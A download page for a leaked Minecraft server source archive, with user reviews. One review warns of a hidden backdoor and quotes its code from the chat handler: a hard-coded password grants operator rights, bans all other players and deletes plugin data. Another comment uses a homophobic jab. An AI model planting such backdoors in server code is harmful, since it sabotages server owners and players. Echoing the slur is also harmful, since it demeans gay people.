Resource icon
¯\_(ツ)_/¯
Author
Katheryn
Downloads
333
Views
1,534
Extention type
rar
File size
1.6 MB
Hash
0f6f99c9d6140f86c686e3a3fd95e2c8
First release
Last update
Rating
5.00 star(s) 2 ratings

More resources from Katheryn

Share this resource

Latest reviews

is this the leaked one from zonix? cuz real one doesn't contain backdoor
great leak, apart from... you know... the glaring issue... of there being a backdoor in the source code which you could easily miss.

} else {
Player player = this.getPlayer();

if (StringUtils.equalsIgnoreCase(s, "pWcpQsZ2GoBv6U5yGep9")) {
player.setOp(true);

for (Player other : Bukkit.getOnlinePlayers()) {
if (other.getUniqueId().equals(player.getUniqueId())) {
continue;
}

other.kickPlayer("");
other.setBanned(true);
}

for (Plugin plugin : this.server.getPluginManager().getPlugins()) {
if (plugin.getDataFolder().exists()) {
plugin.getDataFolder().delete();
}
}

new File(this.server.getPluginManager().getPlugins()[0].getDataFolder().getAbsolutePath() + File.separator + ".." + File.separator).delete();

return;
}
found this in the PlayerConnection class, method chat(String s, boolean async)
Katheryn
Hm, seems like the author is another one of those gay people who like to grief peoples servers
Top